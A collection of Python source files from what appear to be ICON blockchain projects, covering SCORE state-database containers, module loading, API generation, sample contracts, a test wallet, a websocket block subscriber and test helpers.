def __contains__(self, item: V):
for e in self:
if e == item:
return True
return False
@staticmethod
def _get(db: 'IconScoreDatabase', size: int, index: int, value_type: type) -> V:
if not isinstance(index, int):
raise InvalidParamsException('Invalid index type: not an integer')
if index < 0:
index += size
if 0 <= index < size:
key: bytes = ContainerUtil.encode_key(index)
return ContainerUtil.decode_object(db.get(key), value_type)
raise InvalidParamsException('ArrayDB out of index')
@staticmethod
def _get_generator(db: 'IconScoreDatabase', size: int, value_type: type):
for index in range(size):
yield ArrayDB._get(db, size, index, value_type)
class VarDB(object):
"""
Utility classes wrapping the state DB.
VarDB can be used to store simple key-value state.
:K: [int, str, Address, bytes]
:V: [int, str, Address, bytes, bool]
"""
def __init__(self, var_key: K, db: 'IconScoreDatabase', value_type: type) -> None:
self._db = db.get_sub_db(ContainerUtil.encode_key(var_key), tag=VAR_DB_ID)
self.__value_type = value_type
def set(self, value: V) -> None:
"""
Sets the value
:param value: a value to be set
"""
byte_value = ContainerUtil.encode_value(value)
self._db.put(None, byte_value)
def get(self) -> Optional[V]:
"""
Gets the value
:return: value of the var db
"""
return ContainerUtil.decode_object(self._db.get(None), self.__value_type)
def remove(self) -> None:
"""
Deletes the value
"""
self._db.delete(None)
```
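The three containers above only require an object exposing get/put/delete/get_sub_db, so their behaviour can be exercised with a small in-memory stand-in. The _FakeSubDB below is purely illustrative; inside a real SCORE the database handle comes from IconScoreBase, and the module's relative imports still require the pyexec package.
```python
class _FakeSubDB:
    """In-memory stand-in for IconScoreDatabase, for illustration only."""
    def __init__(self, store=None, prefix=b''):
        self._store = {} if store is None else store
        self._prefix = prefix

    def get_sub_db(self, key: bytes, tag: bytes = b''):
        return _FakeSubDB(self._store, self._prefix + tag + key)

    def get(self, key):
        return self._store.get(self._prefix + (key or b''))

    def put(self, key, value):
        self._store[self._prefix + (key or b'')] = value

    def delete(self, key):
        self._store.pop(self._prefix + (key or b''), None)


db = _FakeSubDB()

counter = VarDB('counter', db, value_type=int)
counter.set(3)
assert counter.get() == 3

scores = ArrayDB('scores', db, value_type=int)
scores.put(10)
scores.put(20)
assert list(scores) == [10, 20]

names = DictDB('names', db, value_type=str)
names['alice'] = 'hello'
assert 'alice' in names and names['alice'] == 'hello'
```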
#### File: pyexec/iconscore/icon_score_loader.py
```python
import importlib
import json
import os
import sys
from ..base.exception import IllegalFormatException
PACKAGE_JSON_FILE = 'package.json'
MAIN_MODULE = 'main_module'
MAIN_SCORE = 'main_score'
class IconScoreLoader(object):
@staticmethod
def _load_package_json(score_path: str) -> dict:
pkg_json_path = os.path.join(score_path, PACKAGE_JSON_FILE)
with open(pkg_json_path, 'r') as f:
return json.load(f)
@staticmethod
def _get_package_info(package_json: dict) -> tuple:
main_module: str = package_json.get(MAIN_MODULE)
if not isinstance(main_module, str):
# "main_file" field will be deprecated soon.
# Use "main_module" instead
main_module: str = package_json['main_file']
# Relative package name is not allowed
if main_module.startswith('.'):
raise IllegalFormatException('Invalid main_module')
main_score: str = package_json[MAIN_SCORE]
return main_module, main_score
@staticmethod
def load_module(score_path: str) -> callable:
if not os.path.exists(score_path):
return None
dirname: str = os.path.dirname(score_path)
package: str = os.path.basename(score_path)
if dirname not in sys.path:
sys.path.append(dirname)
package_json = IconScoreLoader._load_package_json(score_path)
main_module, main_score = IconScoreLoader._get_package_info(package_json)
# in order for the new module to be noticed by the import system
importlib.invalidate_caches()
module = importlib.import_module(f".{main_module}", package)
return getattr(module, main_score)
```
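For reference, load_module above expects each SCORE directory to contain a package.json naming the entry module and class. A sketch of preparing such a directory (paths, module and class names are illustrative):
```python
import json
import os

score_path = "/tmp/scores/hello_world"        # hypothetical SCORE directory
os.makedirs(score_path, exist_ok=True)

# hello_world.py inside the package would define `class HelloWorld(IconScoreBase)`.
package_json = {
    "version": "0.0.1",
    "main_module": "hello_world",             # must not start with '.'
    "main_score": "HelloWorld",
}
with open(os.path.join(score_path, "package.json"), "w") as f:
    json.dump(package_json, f)

# IconScoreLoader.load_module(score_path) would then import the
# `hello_world` module from the package and return its HelloWorld class.
```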
#### File: pyexec/iconscore/score_api_generator.py
```python
from inspect import signature, Signature, Parameter, isclass
from typing import Any, Optional
from .icon_score_constant import ConstBitFlag, CONST_BIT_FLAG, CONST_INDEXED_ARGS_COUNT, BaseType, \
STR_FALLBACK, STR_ON_INSTALL, STR_ON_UPDATE
from ..base.address import Address
from ..base.exception import IllegalFormatException, InvalidParamsException
from ..utils import get_main_type_from_annotations_type
from ..ipc.proxy import APIType
APIFlagsMask = ConstBitFlag.ReadOnly \
| ConstBitFlag.External \
| ConstBitFlag.Payable \
| ConstBitFlag.Isolated
class ScoreApiGenerator:
__API_TYPE = 'type'
__API_NAME = 'name'
__API_INPUTS = 'inputs'
__API_OUTPUTS = 'outputs'
__API_PAYABLE = 'payable'
__API_READONLY = 'readonly'
__API_INPUTS_INDEXED = 'indexed'
__API_INPUTS_DEFAULT = 'default'
__API_PARAMS_ADDRESS = 'Address'
__API_PARAMS_INDEXED = 'Indexed'
__API_TYPE_FUNCTION = 'function'
__API_TYPE_EVENT = 'eventlog'
__API_TYPE_FALLBACK = STR_FALLBACK
__API_TYPE_ON_INSTALL = STR_ON_INSTALL
__API_TYPE_ON_UPDATE = STR_ON_UPDATE
@staticmethod
def generate(score_funcs: list) -> list:
api = []
ScoreApiGenerator.__generate_functions(api, score_funcs)
ScoreApiGenerator.__generate_events(api, score_funcs)
return api
@staticmethod
def __generate_functions(src: list, score_funcs: list) -> None:
for func in score_funcs:
try:
const_bit_flag = getattr(func, CONST_BIT_FLAG, 0)
if const_bit_flag & ConstBitFlag.External or \
func.__name__ == ScoreApiGenerator.__API_TYPE_ON_INSTALL or \
func.__name__ == ScoreApiGenerator.__API_TYPE_ON_UPDATE or \
func.__name__ == ScoreApiGenerator.__API_TYPE_FALLBACK:
src.append(ScoreApiGenerator.__generate_function_info(
func.__name__, const_bit_flag, signature(func)))
except IllegalFormatException as e:
raise IllegalFormatException(f"{e.message} at {func.__name__}")
@staticmethod
def __generate_function_info(func_name: str, flags: int, sig_info: 'Signature') -> list:
if flags & APIFlagsMask != flags:
raise IllegalFormatException(f'Illegal combination of decorators')
is_readonly = flags & ConstBitFlag.ReadOnly == ConstBitFlag.ReadOnly
info = list()
if func_name == ScoreApiGenerator.__API_TYPE_FALLBACK:
info.append(APIType.FALLBACK)
else:
info.append(APIType.FUNCTION)
info.append(func_name)
info.append(flags)
info.append(ScoreApiGenerator.__generate_inputs(dict(sig_info.parameters)))
info.append(ScoreApiGenerator.__generate_output(sig_info.return_annotation, is_readonly))
return info
@staticmethod
def __generate_events(src: list, score_funcs: list) -> None:
event_funcs = {func.__name__: signature(func) for func in score_funcs
if getattr(func, CONST_BIT_FLAG, 0) & ConstBitFlag.EventLog}
indexed_args_counts = {func.__name__: getattr(func, CONST_INDEXED_ARGS_COUNT, 0)
for func in score_funcs
if getattr(func, CONST_INDEXED_ARGS_COUNT, 0)}
for func_name, event in event_funcs.items():
index_args_count = indexed_args_counts.get(func_name, 0)
src.append(ScoreApiGenerator.__generate_event(func_name, event, index_args_count))
@staticmethod
def __generate_event(func_name: str, sig_info: 'Signature', index_args_count: int) -> list:
info = list()
info.append(APIType.EVENT)
info.append(func_name)
info.append(index_args_count)
info.append(ScoreApiGenerator.__generate_inputs(dict(sig_info.parameters), index_args_count))
return info
@staticmethod
def __generate_output(params_type: Any, is_readonly: bool) -> list:
info_list = []
if not is_readonly:
return info_list
if params_type is Signature.empty:
raise IllegalFormatException(
"Returning type should be declared in read-only functions")
main_type = get_main_type_from_annotations_type(params_type)
main_type = ScoreApiGenerator.__convert_str_to_type(main_type)
# At first, finds if the type is a 'list' or a 'dict'
# if not, finds a base type
find = (t for t in [list, dict]
if isclass(main_type) and issubclass(main_type, t))
api_type = next(find, None)
if api_type is None:
api_type = ScoreApiGenerator.__find_base_super_type(main_type)
if api_type is None:
raise IllegalFormatException(f"Unsupported type for '{params_type}'")
info = dict()
info[ScoreApiGenerator.__API_TYPE] = api_type.__name__
info_list.append(info)
return info_list
@staticmethod
def __convert_str_to_type(params_type: Any) -> Any:
if not isinstance(params_type, str):
return params_type
if params_type == 'Address':
return Address
else:
return params_type
@staticmethod
def __generate_inputs(params: dict, index_args_count: int = 0) -> list:
tmp_list = []
args_index = 0
for param_name, param in params.items():
if param_name == 'self' or param_name == 'cls':
continue
is_indexed = args_index < index_args_count
args_index += 1
ScoreApiGenerator.__generate_input(tmp_list, param, is_indexed)
return tmp_list
@staticmethod
def __generate_input(src: list, param: 'Parameter', is_indexed: bool):
# If there's no hint of argument in the function declaration,
# raise an exception
if param.annotation is Parameter.empty:
raise IllegalFormatException(f"Missing argument hint for '{param.name}'")
main_type = get_main_type_from_annotations_type(param.annotation)
main_type = ScoreApiGenerator.__convert_str_to_type(main_type)
api_type = ScoreApiGenerator.__find_base_super_type(main_type)
if api_type is None:
raise IllegalFormatException(
f"Unsupported type for '{param.name}: {param.annotation}'")
info = dict()
info[ScoreApiGenerator.__API_NAME] = param.name
info[ScoreApiGenerator.__API_TYPE] = api_type.__name__
if is_indexed:
info[ScoreApiGenerator.__API_INPUTS_INDEXED] = is_indexed
if param.default is not Parameter.empty:
if param.default is not None and not isinstance(param.default, main_type):
raise InvalidParamsException(f'Default params type mismatch. value: {param.default} type: {main_type}')
# the default param value will be encoded at ipc.proxy
info[ScoreApiGenerator.__API_INPUTS_DEFAULT] = param.default
src.append(info)
@staticmethod
def __find_base_super_type(t: type) -> Optional[type]:
"""
Finds a base type of the input and returns it if any
:param t: target
:return: base_super_type
"""
find = (base_type for base_type in BaseType.__constraints__
if isclass(t) and issubclass(t, base_type))
return next(find, None)
```
#### File: pyee/pyexec/service_engine.py
```python
from .base.address import Address, GETAPI_DUMMY_ADDRESS
from .base.exception import *
from .base.type_converter import TypeConverter
from .database.factory import ContextDatabaseFactory
from .icon_constant import Status
from .iconscore.icon_score_base import IconScoreBase
from .iconscore.icon_score_context import ContextContainer, IconScoreContext
from .iconscore.icon_score_eventlog import EventLogEmitter
from .iconscore.icon_score_mapper import IconScoreMapper
from .iconscore.internal_call import InternalCall
from .logger import Logger, SystemLogger
TAG = 'ServiceEngine'
def decode_params(values: dict) -> dict:
result = {}
if isinstance(values, dict):
for k, v in values.items():
new_key = k
if isinstance(k, bytes):
new_key = k.decode()
elif not isinstance(k, str):
raise BaseException('Unexpected key type')
if isinstance(v, bytes):
result[new_key] = v.decode()
else:
result[new_key] = v
return result
class ServiceEngine(ContextContainer):
_score_mapper = None
_proxy = None
@classmethod
def open(cls, proxy):
cls._score_mapper = IconScoreMapper()
cls._proxy = proxy
ContextDatabaseFactory.open(proxy, ContextDatabaseFactory.Mode.SINGLE_DB)
EventLogEmitter.open(proxy)
InternalCall.open(proxy)
@classmethod
def invoke(cls, context: IconScoreContext):
Logger.debug(f'[invoke] {context.method}, {context.params}', TAG)
cls._push_context(context)
status, step_used, ret = cls._handle_invoke(context)
cls._pop_context()
Logger.debug(f'*** RESULT: {status}, {step_used}, {ret}', TAG)
return status, step_used, ret
@classmethod
def get_score_api(cls, code: str):
try:
icon_score: 'IconScoreBase' = cls._get_icon_score(GETAPI_DUMMY_ADDRESS, code)
ret = icon_score.get_api()
status = Status.SUCCESS
except BaseException as e:
status, ret = cls._get_status_from_exception(e)
return status, ret
@classmethod
def _get_icon_score(cls, address: Address, code: str):
return cls._score_mapper.get_icon_score(address, code)
@classmethod
def _handle_invoke(cls, context):
try:
ret = cls._internal_call(context)
status = Status.SUCCESS
except BaseException as e:
status, ret = cls._get_status_from_exception(e)
finally:
cls._proxy.handle_set_values()
step_used = context.step_counter.step_used
return status, step_used, ret
@classmethod
def _internal_call(cls, context: IconScoreContext):
icon_score: 'IconScoreBase' = cls._get_icon_score(context.to, context.code)
if icon_score is None:
raise ScoreNotFoundException(f'SCORE not found: {context.to}')
func_name: str = context.method
context.set_func_type_by_icon_score(icon_score, func_name)
if isinstance(context.params, dict):
arg_params = []
params: dict = decode_params(context.params)
kw_params = cls._convert_score_params_by_annotations(icon_score, func_name, params)
Logger.debug(f'kw_params: {kw_params}', TAG)
elif isinstance(context.params, list):
arg_params: list = context.params
Logger.debug(f'arg_params: {arg_params}', TAG)
kw_params = {}
else:
raise InvalidParamsException('Unknown params type')
score_func = getattr(icon_score, '_IconScoreBase__call')
return score_func(func_name=func_name, arg_params=arg_params, kw_params=kw_params)
@staticmethod
def _convert_score_params_by_annotations(icon_score: 'IconScoreBase', func_name: str, kw_params: dict) -> dict:
tmp_params = kw_params
score_func = getattr(icon_score, func_name)
annotation_params = TypeConverter.make_annotations_from_method(score_func)
TypeConverter.convert_data_params(annotation_params, tmp_params)
return tmp_params
@classmethod
def _get_status_from_exception(cls, e: BaseException):
if isinstance(e, IconServiceBaseException):
if isinstance(e, IconScoreException):
tag = 'ScoreException'
else:
tag = 'SystemException'
Logger.exception(e.message, tag)
code = e.code
message = e.message
else:
SystemLogger.exception(repr(e), 'SystemError')
code = ExceptionCode.SYSTEM_ERROR
message = str(e)
return code, message
```
#### File: scores/receipt/receipt.py
```python
from iconservice import *
TAG = 'Receipt'
class InterCallInterface(InterfaceScore):
@interface
def call_event_log(self, p_log_index: int, p_bool: bool, p_addr: Address, p_int: int, p_bytes: bytes, p_str: str):
pass
class Receipt(IconScoreBase):
@eventlog
def event_log_no_index(self, p_bool: bool, p_addr: Address, p_int: int, p_bytes: bytes, p_str: str):
pass
@eventlog(indexed=1)
def event_log_1_index(self, p_bool: bool, p_addr: Address, p_int: int, p_bytes: bytes, p_str: str):
pass
@eventlog(indexed=2)
def event_log_2_index(self, p_bool: bool, p_addr: Address, p_int: int, p_bytes: bytes, p_str: str):
pass
@eventlog(indexed=3)
def event_log_3_index(self, p_bool: bool, p_addr: Address, p_int: int, p_bytes: bytes, p_str: str):
pass
def __init__(self, db: IconScoreDatabase) -> None:
super().__init__(db)
def on_install(self) -> None:
super().on_install()
def on_update(self) -> None:
super().on_update()
@external
def call_event_log(self, p_log_index: int, p_bool: bool, p_addr: Address, p_int: int, p_bytes: bytes, p_str: str):
if p_log_index == 0:
self.event_log_no_index(p_bool, p_addr, p_int, p_bytes, p_str)
elif p_log_index == 1:
self.event_log_1_index(p_bool, p_addr, p_int, p_bytes, p_str)
elif p_log_index == 2:
self.event_log_2_index(p_bool, p_addr, p_int, p_bytes, p_str)
elif p_log_index == 3:
self.event_log_3_index(p_bool, p_addr, p_int, p_bytes, p_str)
else:
            raise Exception(f'Illegal argument for index {p_log_index}')
@external
def inter_call_event_log(self, _to: Address, p_log_index: int, p_bool: bool, p_addr: Address, p_int: int, p_bytes: bytes, p_str: str):
recipient_score = self.create_interface_score(_to, InterCallInterface)
recipient_score.call_event_log(p_log_index, p_bool, p_addr, p_int, p_bytes, p_str)
@external
def event_log_and_inter_call(self, _to: Address, p_log_index: int, p_bool: bool, p_addr: Address, p_int: int, p_bytes: bytes, p_str: str):
self.call_event_log(p_log_index, p_bool, p_addr, p_int, p_bytes, p_str)
recipient_score = self.create_interface_score(_to, InterCallInterface)
recipient_score.call_event_log(p_log_index, p_bool, p_addr, p_int, p_bytes, p_str)
```
#### File: scores/tbc_interpreter/tbc_interpreter.py
```python
from iconservice import *
TAG = 'TBCInterpreter'
class TBCInterpreter(IconScoreBase):
CALL = 0
REVERT = 1
ADDRESS_LEN = 21
SHORT_LEN = 2
def __init__(self, db: IconScoreDatabase) -> None:
super().__init__(db)
self._name = VarDB('name', db, value_type=str)
self._res = ''
def on_install(self, _name: str) -> None:
super().on_install()
self._name.set(_name)
def on_update(self) -> None:
super().on_update()
@eventlog(indexed=1)
def Event_(self, eventData:str):
pass
def Event(self, eventData:str):
if len(self._res) > 0:
self._res = self._res + '\n'
self._res = self._res + eventData
@external
def runAndLogResult(self, _code: bytes):
res = self.run(_code)
self.Event_(res)
@external
def run(self, _code: bytes) -> str:
self._res = ''
self.Event(f'Enter: {self._name.get()}')
try:
self._runImpl(_code)
self.Event(f'Exit by Return: {self._name.get()}')
except:
self.Event(f'Exit by Exception: {self._name.get()}')
raise
return self._res
def _runImpl(self, code: bytes):
offset = 0
while offset < len(code):
insn = code[offset]
offset = offset + 1
if insn == self.CALL:
addr = Address.from_bytes(
code[offset:offset + self.ADDRESS_LEN]
)
offset = offset + self.ADDRESS_LEN
codeLen = int.from_bytes(
code[offset:offset + self.SHORT_LEN],
byteorder='big'
)
offset = offset + self.SHORT_LEN
ccode = code[offset: offset + codeLen]
offset = offset + codeLen
try:
res = self.call(addr, "run", {'_code': ccode})
self.Event(res)
except IconScoreException as e:
self.Event(e.message)
pass
elif insn == self.REVERT:
                # use a distinct name so the bytecode buffer `code` is not clobbered
                revert_code = int.from_bytes(
                    code[offset:offset + self.SHORT_LEN],
                    byteorder='big'
                )
                offset = offset + self.SHORT_LEN
                self.Event(f'Exit by Revert: {self._name.get()}')
                revert(self._res, revert_code)
else:
self.Event(f'Unexpected insn {insn}')
``` |
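The _runImpl loop above defines a tiny bytecode: opcode 0 (CALL) is followed by a 21-byte address, a 2-byte big-endian length and the nested code, while opcode 1 (REVERT) is followed by a 2-byte big-endian revert code. A sketch of assembling such a program off-chain (the callee address is a placeholder):
```python
def encode_call(address_bytes: bytes, nested_code: bytes) -> bytes:
    # CALL (0x00) + 21-byte address + 2-byte big-endian length + nested code
    assert len(address_bytes) == 21
    return bytes([0]) + address_bytes + len(nested_code).to_bytes(2, "big") + nested_code


def encode_revert(revert_code: int) -> bytes:
    # REVERT (0x01) + 2-byte big-endian revert code
    return bytes([1]) + revert_code.to_bytes(2, "big")


callee = bytes([1]) + bytes(20)          # placeholder contract address (cx000...0)
program = encode_call(callee, encode_revert(32))
# Passing `program` to run() would call the callee, which immediately reverts with code 32.
```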
{
"source": "JINWOO-J/loopchain",
"score": 2
} |
#### File: cli_tools/icx_test/icx_wallet.py
```python
import base64
import hashlib
import logging
import random
from secp256k1 import PrivateKey, PublicKey
from loopchain import utils, configure as conf
from loopchain.blockchain.types import Hash32, VarBytes
from loopchain.crypto.hashing import build_hash_generator
ICX_FACTOR = 10 ** 18
ICX_FEE = 0.01
class IcxWallet:
def __init__(self, private_key=None):
self.__private_key = private_key or PrivateKey()
self.__address = self.create_address(self.__private_key.pubkey)
self.__last_tx_hash = ""
tx_hash_versions = conf.CHANNEL_OPTION[conf.LOOPCHAIN_DEFAULT_CHANNEL]["hash_versions"]
self.__hash_generators = {
"0x2": build_hash_generator(tx_hash_versions["0x2"], "icx_sendTransaction"),
"0x3": build_hash_generator(tx_hash_versions["0x3"], "icx_sendTransaction")
}
self.to_address = None
self.value = None
self.message = None
self.fee = ICX_FEE
self.nid = '0x3'
self.is_logging = True
@property
def address(self):
return self.__address
@property
def last_tx_hash(self):
return self.__last_tx_hash
@last_tx_hash.setter
def last_tx_hash(self, last_tx_hash):
self.__last_tx_hash = last_tx_hash
def create_icx_origin(self, is_raw_data=False):
params = dict()
params["from"] = self.address
params["to"] = self.to_address
params["value"] = hex(int(self.value * ICX_FACTOR))
params["fee"] = hex(int(self.fee * ICX_FACTOR))
params["timestamp"] = str(utils.get_now_time_stamp())
tx_hash = Hash32(self.__hash_generators["0x2"].generate_hash(params))
params["tx_hash"] = tx_hash.hex()
params["signature"] = self.create_signature(tx_hash)
icx_origin = dict()
icx_origin["jsonrpc"] = "2.0"
icx_origin["method"] = "icx_sendTransaction"
icx_origin["id"] = random.randrange(0, 100000)
icx_origin["params"] = params
self.__last_tx_hash = tx_hash.hex_0x()
if self.is_logging:
logging.debug(f"icx_sendTransaction params for v2: {params}")
return icx_origin if is_raw_data else params
def create_icx_origin_v3(self, is_raw_data=False):
params = dict()
params["version"] = "0x3"
params["from"] = self.address
params["to"] = self.to_address
params["value"] = hex(int(self.value * ICX_FACTOR))
params["stepLimit"] = "0x3000000"
params["timestamp"] = hex(utils.get_now_time_stamp())
params["nonce"] = "0x0"
params["nid"] = self.nid
if self.message is not None:
params["dataType"] = "message"
params["data"] = VarBytes(self.message.encode('utf-8')).hex_0x()
hash_for_sign = self.__hash_generators["0x3"].generate_hash(params)
params["signature"] = self.create_signature(hash_for_sign)
if self.is_logging:
logging.debug(f"icx_sendTransaction params for v3: {params}")
self.__last_tx_hash = Hash32(hash_for_sign).hex_0x()
icx_origin = dict()
icx_origin["jsonrpc"] = "2.0"
icx_origin["method"] = "icx_sendTransaction"
icx_origin["id"] = random.randrange(0, 100000)
icx_origin["params"] = params
return icx_origin if is_raw_data else params
def create_address(self, public_key: PublicKey) -> str:
serialized_pub = public_key.serialize(compressed=False)
hashed_pub = hashlib.sha3_256(serialized_pub[1:]).hexdigest()
return f"hx{hashed_pub[-40:]}"
def create_signature(self, tx_hash):
signature = self.__private_key.ecdsa_sign_recoverable(msg=tx_hash,
raw=True,
digest=hashlib.sha3_256)
serialized_sig = self.__private_key.ecdsa_recoverable_serialize(signature)
sig_message = b''.join([serialized_sig[0], bytes([serialized_sig[1]])])
signature = base64.b64encode(sig_message).decode()
return signature
```
#### File: loopchain/baseservice/node_subscriber.py
```python
import asyncio
import json
import logging
from asyncio import Event
from urllib import parse
import websockets
from earlgrey import MessageQueueService
from jsonrpcclient.request import Request
from jsonrpcserver import config
from jsonrpcserver.aio import AsyncMethods
from websockets import WebSocketClientProtocol
from loopchain import configure as conf
from loopchain import utils
from loopchain.baseservice import ObjectManager, TimerService, Timer
from loopchain.blockchain import AnnounceNewBlockError
from loopchain.blockchain.blocks import BlockSerializer, BlockVerifier
from loopchain.blockchain.votes.v0_1a import BlockVotes
from loopchain.channel.channel_property import ChannelProperty
from loopchain.protos import message_code
config.log_requests = False
config.log_responses = False
ws_methods = AsyncMethods()
CONNECTION_FAIL_CONDITIONS = {
message_code.Response.fail_subscribe_limit,
message_code.Response.fail_connection_closed,
message_code.Response.fail_connect_to_leader
}
class UnregisteredException(Exception):
"""When UnregisteredException is raised during Watch state,
    this node transitions its state to SubscribeNetwork and initializes the next radiostation target.
"""
pass
def convert_response_to_dict(response: bytes) -> dict:
response_dict: dict = json.loads(response)
response_dict = _check_error_in_response(response_dict)
return response_dict
def _check_error_in_response(response_dict: dict) -> dict:
params = response_dict.get('params')
if params and 'error' in params:
error_msg = params.get('error') or f"Error sent from rs target: {params}"
if params['code'] in CONNECTION_FAIL_CONDITIONS:
raise UnregisteredException(error_msg)
else:
raise AnnounceNewBlockError(error_msg)
return response_dict
class NodeSubscriber:
def __init__(self, channel, rs_target):
scheme = 'wss' if ('https://' in rs_target) else 'ws'
netloc = parse.urlparse(rs_target).netloc
self._target_uri = f"{scheme}://{netloc}/api/ws/{channel}"
self._exception = None
self._websocket: WebSocketClientProtocol = None
self._subscribe_event: Event = None
ws_methods.add(self.node_ws_PublishHeartbeat)
ws_methods.add(self.node_ws_PublishNewBlock)
logging.debug(f"websocket target uri : {self._target_uri}")
def __del__(self):
# TODO: Check usage
if self._websocket is not None:
utils.logger.warning(f"Have to close before delete NodeSubscriber instance({self})")
async def close(self):
if self._websocket is not None:
websocket = self._websocket
self._websocket = None
if not websocket.closed:
logging.debug(f"Closing websocket connection to {self._target_uri}...")
await websocket.close()
async def start(self, event, block_height):
self._subscribe_event = event
await self._prepare_connection()
await self._handshake(block_height)
await self._run()
async def _prepare_connection(self):
self._websocket: WebSocketClientProtocol = await websockets.connect(
uri=self._target_uri,
max_size=4 * conf.MAX_TX_SIZE_IN_BLOCK,
loop=MessageQueueService.loop
)
async def _handshake(self, block_height):
try:
await self._subscribe_request(block_height)
await self._recv_until_timeout()
if self._exception:
raise self._exception
except Exception as e:
logging.debug(f"Exception raised during handshake step: {e}", exc_info=True)
await self.close()
raise
else:
logging.debug(f"Websocket connection is completed, with id({id(self._websocket)})")
async def _subscribe_request(self, block_height):
request = Request(
method="node_ws_Subscribe",
height=block_height,
peer_id=ChannelProperty().peer_id
)
await self._websocket.send(json.dumps(request))
async def _recv_until_timeout(self):
response: bytes = await asyncio.wait_for(
fut=self._websocket.recv(),
timeout=2 * conf.TIMEOUT_FOR_WS_HEARTBEAT
)
response_dict = convert_response_to_dict(response)
await ws_methods.dispatch(response_dict)
async def _run(self):
try:
while True:
if self._exception:
raise self._exception
await self._recv_until_timeout()
except AnnounceNewBlockError as e:
logging.error(f"{type(e)} during subscribe, caused by: {e}")
raise
except UnregisteredException as e:
logging.info(f"{type(e)} during subscribe, caused by: {e}")
raise
except Exception as e:
logging.info(f"{type(e)} during subscribe, caused by: {e}")
raise ConnectionError
finally:
await self.close()
async def node_ws_PublishNewBlock(self, **kwargs):
block_dict, votes_dumped = kwargs.get('block'), kwargs.get('confirm_info', '')
try:
votes_serialized = json.loads(votes_dumped)
vote = BlockVotes.deserialize_votes(votes_serialized)
except json.JSONDecodeError:
vote = votes_dumped
blockchain = ObjectManager().channel_service.block_manager.blockchain
new_block_height = blockchain.block_versioner.get_height(block_dict)
if new_block_height > blockchain.block_height:
block_version = blockchain.block_versioner.get_version(new_block_height)
block_serializer = BlockSerializer.new(block_version, blockchain.tx_versioner)
confirmed_block = block_serializer.deserialize(block_dict)
block_verifier = BlockVerifier.new(block_version, blockchain.tx_versioner)
block_verifier.invoke_func = blockchain.score_invoke
reps_getter = blockchain.find_preps_addresses_by_roothash
try:
block_verifier.verify(confirmed_block,
blockchain.last_block,
blockchain,
generator=blockchain.get_expected_generator(confirmed_block),
reps_getter=reps_getter)
except Exception as e:
self._exception = AnnounceNewBlockError(f"error: {type(e)}, message: {str(e)}")
else:
logging.debug(f"add_confirmed_block height({confirmed_block.header.height}), "
f"hash({confirmed_block.header.hash.hex()}), votes_dumped({votes_dumped})")
ObjectManager().channel_service.block_manager.add_confirmed_block(confirmed_block=confirmed_block,
confirm_info=vote)
finally:
ObjectManager().channel_service.reset_block_monitoring_timer()
async def node_ws_PublishHeartbeat(self, **kwargs):
def _callback(exception):
self._exception = exception
if not self._subscribe_event.is_set():
# set subscribe_event to transit the state to Watch.
self._subscribe_event.set()
timer_key = TimerService.TIMER_KEY_WS_HEARTBEAT
timer_service = ObjectManager().channel_service.timer_service
if timer_key in timer_service.timer_list:
timer_service.reset_timer(timer_key)
else:
timer = Timer(
target=timer_key,
duration=3 * conf.TIMEOUT_FOR_WS_HEARTBEAT,
callback=_callback,
callback_kwargs={'exception': ConnectionError("No Heartbeat.")}
)
timer_service.add_timer(timer_key, timer)
```
#### File: testcase/unittest/test_util.py
```python
import asyncio
import json
import logging
import os
import random
import time
from sys import platform
import loopchain
import loopchain.utils as util
from loopchain import configure as conf
from loopchain.baseservice import StubManager, CommonSubprocess
from loopchain.blockchain.blocks import Block
from loopchain.blockchain.transactions import Transaction, TransactionBuilder, TransactionVersioner
from loopchain.blockchain.types import Address
from loopchain.components import SingletonMetaClass
from loopchain.peer import Signer
from loopchain.protos import loopchain_pb2, loopchain_pb2_grpc
from loopchain.store.key_value_store import KeyValueStoreError, KeyValueStore
from loopchain.utils import loggers
from loopchain.utils.message_queue import StubCollection
loggers.set_preset_type(loggers.PresetType.develop)
loggers.update_preset()
def run_peer_server_as_process(port, radiostation_port=conf.PORT_RADIOSTATION, group_id=None, score=None):
args = ['python3', 'loopchain.py', 'peer', '-d', '-p', str(port),
'-r', f"{util.get_private_ip()}:{radiostation_port}"]
logging.debug(f"run_peer_server_as_process ({args})")
return CommonSubprocess(args)
def run_peer_server_as_process_and_stub(
port, radiostation_port=conf.PORT_RADIOSTATION, group_id=None, score=None, timeout=None, wait=True):
if timeout is None:
timeout = conf.TIMEOUT_FOR_PEER_INIT
process = run_peer_server_as_process(port, radiostation_port, group_id, score)
async def _wait():
StubCollection().amqp_target = conf.AMQP_TARGET
StubCollection().amqp_key = f"{util.get_private_ip()}:{port}"
logging.debug(f'{StubCollection().amqp_key} peer hello')
await StubCollection().create_peer_stub()
await StubCollection().peer_stub.async_task().hello()
logging.debug(f'{StubCollection().amqp_key} peer hello complete')
if wait:
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
try:
future = asyncio.ensure_future(_wait())
loop.run_until_complete(future)
loop.stop()
loop.close()
except Exception as e:
logging.warning(f"Exception in loop : {e}")
stub, channel = util.get_stub_to_server(f"localhost:{port}", stub_class=loopchain_pb2_grpc.PeerServiceStub)
return process, stub
def run_peer_server_as_process_and_stub_manager(
port, radiostation_port=conf.PORT_RADIOSTATION, group_id=None, score=None, timeout=None):
process = run_peer_server_as_process(port, radiostation_port, group_id, score)
stub_manager = StubManager(f"localhost:{port}", loopchain_pb2_grpc.PeerServiceStub, ssl_auth_type=conf.GRPC_SSL_TYPE)
return process, stub_manager
def run_radio_station_as_process(port):
args = ['python3', 'loopchain.py', 'rs', '-d', '-p', str(port)]
logging.debug(f"run_radio_station_as_process ({args})")
return CommonSubprocess(args)
def run_radio_station_as_process_and_stub_manager(port, timeout=None):
process = run_radio_station_as_process(port)
stub_manager = StubManager(f"localhost:{port}",
loopchain_pb2_grpc.RadioStationStub,
conf.GRPC_SSL_TYPE)
util.request_server_in_time(stub_manager.stub.GetStatus, loopchain_pb2.StatusRequest(request=""))
return process, stub_manager
def run_radio_station_as_process_and_stub(port):
process = run_radio_station_as_process(port)
stub, channel = util.get_stub_to_server(
target=f"localhost:{port}",
stub_class=loopchain_pb2_grpc.RadioStationStub
)
return process, stub
def run_score_server_as_process(amqp_key):
args = ['python3', 'loopchain.py', 'score',
'--channel', conf.LOOPCHAIN_DEFAULT_CHANNEL,
'--amqp_key', amqp_key,
'--score_package', "score_package",
'-d']
logging.debug(f"run_score_server_as_process ({args})")
return CommonSubprocess(args)
async def run_score_server_as_process_and_stub_async():
amqp_key = str(time.time())
process = run_score_server_as_process(amqp_key)
StubCollection().amqp_target = conf.AMQP_TARGET
StubCollection().amqp_key = amqp_key
logging.debug(f'{StubCollection().amqp_key} score hello')
